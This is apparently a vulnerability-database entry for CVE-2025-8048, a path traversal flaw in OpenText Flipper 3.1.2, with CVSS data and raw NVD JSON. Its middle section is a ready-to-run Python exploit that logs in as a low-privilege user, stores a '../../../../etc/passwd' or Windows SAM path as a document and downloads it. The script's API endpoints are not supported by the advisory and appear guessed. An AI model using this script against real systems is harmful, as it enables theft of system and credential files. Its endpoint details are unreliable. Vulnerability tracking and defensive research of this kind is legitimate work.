Security Vulnerability Report
中文
CVE-2025-8048 CVSS 6.5 MEDIUM

CVE-2025-8048

Published: 2025-10-20 20:15:38
Last Modified: 2025-10-28 16:12:51

Description

External Control of File Name or Path vulnerability in opentext Flipper allows Path Traversal. The vulnerability could allow a user to submit a stored local file path and then download the specified file from the system by requesting the stored document ID. This issue affects Flipper: 3.1.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opentext:flipper:3.1.2:*:*:*:*:*:*:* - VULNERABLE
OpenText Flipper 3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8048 - OpenText Flipper Path Traversal PoC # This PoC demonstrates the path traversal vulnerability in OpenText Flipper 3.1.2 # The vulnerability allows a low-privileged user to read arbitrary files from the system import requests TARGET_URL = "https://target-flipper-server.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate with low-privileged credentials session = requests.Session() login_payload = { "username": USERNAME, "password": PASSWORD } session.post(f"{TARGET_URL}/api/login", data=login_payload) # Step 2: Submit a malicious file path (path traversal payload) # The path traversal sequence allows reading files outside the intended directory malicious_path = "../../../../etc/passwd" # Linux target # malicious_path = "..\\..\\..\\..\\Windows\\System32\\config\\SAM" # Windows target submit_payload = { "file_path": malicious_path, "description": "legitimate document" } response = session.post(f"{TARGET_URL}/api/documents/submit", json=submit_payload) document_id = response.json().get("document_id") print(f"[+] Stored malicious path with document ID: {document_id}") # Step 3: Request the stored document ID to trigger file download download_response = session.get(f"{TARGET_URL}/api/documents/{document_id}/download") if download_response.status_code == 200: print(f"[+] Successfully retrieved file contents:") print(download_response.text) else: print(f"[-] Failed to retrieve file. Status code: {download_response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8048", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:38.007", "lastModified": "2025-10-28T16:12:50.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Control of File Name or Path vulnerability in opentext Flipper allows Path Traversal. The vulnerability could allow a user to submit a stored local file\npath and then download the specified file from the system by requesting the\nstored document ID.\n\n\n\n\n\n\n\nThis issue affects Flipper: 3.1.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:D/RE:M/U:Green", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "PRESENT", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentext:flipper:3.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "9E0F3913-F439-4C0A-82C8-AAEEEEBED8FD"}]}]}], "references": [{"url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0850531", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}